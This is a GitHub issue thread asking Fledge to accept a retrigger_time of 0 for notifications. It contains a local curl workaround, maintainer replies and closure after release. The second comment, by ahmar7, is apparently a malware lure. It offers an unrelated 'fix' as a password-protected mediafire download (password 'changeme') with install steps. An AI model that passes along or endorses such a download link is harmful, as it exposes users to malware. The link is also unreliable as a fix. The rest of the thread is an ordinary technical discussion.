fledge-iot/fledge #1453: Allow retrigger_time of 0 for notifications

FlorentP42, 2024-08-27:
**Is your feature request related to a problem? Please describe.**
When creating a notification instance of type `retriggered`, you can define the `retrigger_time` which is the interval the notification instance must wait before sending two consecutive notifications.

One of the use cases we use notifications for in the context of systemsp requires this time to be zero.

However both the Fledge backend and the Fledge GUI does not allow a value of zero for the `retrigger_time` parameter.

**Describe the solution you'd like**
Allow a value of 0 for `retrigger_time` when defining or editing a notification instance.

**Describe alternatives you've considered**
Currently we are using the following workaround which initializes the notification service with `retrigger_time=1` and then edit that configuration with `retrigger_time=-1`:
```bash
# Create Notification plugins
curl -sX POST http://localhost:8081/fledge/notification -d '{"name":"'$notif_name_1'","description":"'$notif_name_1' notification instance","rule":"'$notif_plugin_1'","channel":"'$notif_plugin_2'","notification_type":"retriggered","enabled":true,"retrigger_time":"1","rule_config":{},"delivery_config":{}}'
# Workaround for delay between notifications (we want 0 but Fledge does not allow it, and -1 is rejected at notification instance creation)
curl -X PUT --data '{"retrigger_time":"-1"}' http://localhost:8081/fledge/category/$notif_name_1
```
This is a pretty ugly solution which is subject to break if the Fledge API gets updated and also starts to refuse negative values.

**Additional context**
Existing repositories that would benefit from this features:
* https://github.com/fledge-power/fledgepower-rule-systemsp
* https://github.com/fledge-power/fledgepower-notify-systemsp

ahmar7, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

mshariq-nerd, 2024-09-04:
@FlorentP42 This issue has been fixed now. You can verify the available fix in current develop & nightly packages.   
API : https://github.com/fledge-iot/fledge/pull/1457
GUI: https://github.com/fledge-iot/fledge-gui/pull/455

FlorentP42, 2024-09-05:
Great news :) Is it all right to leave this issue open until an official release containing the fix is produced?

mshariq-nerd, 2024-09-05:
Yeah sure, we can close this once fix is available in next official release.

mshariq-nerd, 2024-11-05:
Fixed in latest release [v2.6.0](https://github.com/fledge-iot/fledge/releases/tag/v2.6.0)

closed 2024-11-05 by mshariq-nerd